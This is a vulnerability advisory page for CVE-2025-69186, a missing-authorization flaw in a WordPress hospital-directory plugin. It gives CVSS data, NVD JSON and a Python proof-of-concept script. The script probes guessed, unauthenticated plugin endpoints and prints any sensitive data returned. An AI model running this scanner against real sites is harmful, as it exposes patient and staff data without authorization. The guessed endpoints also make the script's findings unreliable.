Security Vulnerability Report
中文
CVE-2025-69186 CVSS 7.3 HIGH

CVE-2025-69186

Published: 2026-01-22 17:16:25
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hospital Doctor Directory <= 1.3.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69186 PoC - WordPress Hospital Doctor Directory Broken Access Control # Target: WordPress site with Hospital Doctor Directory plugin <= 1.3.9 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-69186 Missing Authorization vulnerability in Hospital Doctor Directory plugin """ # Define potential vulnerable endpoints # These are common WordPress REST API or admin-ajax endpoints vulnerable_endpoints = [ "/wp-json/hospital-doctor-directory/v1/doctors", "/wp-json/hospital-doctor-directory/v1/hospitals", "/wp-json/hospital-doctor-directory/v1/appointments", "/wp-admin/admin-ajax.php?action=hdd_get_doctors", "/wp-admin/admin-ajax.php?action=hdd_get_hospitals", "/wp-admin/admin-ajax.php?action=hdd_manage_appointments", "/wp-admin/admin-ajax.php?action=hdd_export_data", "/wp-admin/admin-ajax.php?action=hdd_get_settings" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-69186 - Missing Authorization in Hospital Doctor Directory") print("-" * 60) vulnerable_found = False for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Try GET request without authentication response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we get unauthorized access or data without auth if response.status_code == 200: # Check if response contains sensitive data if any(keyword in response.text.lower() for keyword in ['doctor', 'hospital', 'patient', 'appointment', 'name', 'email', 'phone']): print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response contains sensitive data without authentication") print(f" Response preview: {response.text[:200]}...") vulnerable_found = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") else: print(f"[*] Unknown: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") print("-" * 60) if vulnerable_found: print("[!] VULNERABLE - Target is affected by CVE-2025-69186") print("[!] Recommendation: Update Hospital Doctor Directory plugin to version > 1.3.9") else: print("[*] No obvious vulnerability found (manual verification recommended)") return vulnerable_found if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-69186-poc.py <target_url>") print("Example: python cve-2025-69186-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69186", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:25.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en e-plugins Hospital Doctor Directory hospital-doctor-directory permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Hospital Doctor Directory: desde n/a hasta &lt;= 1.3.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}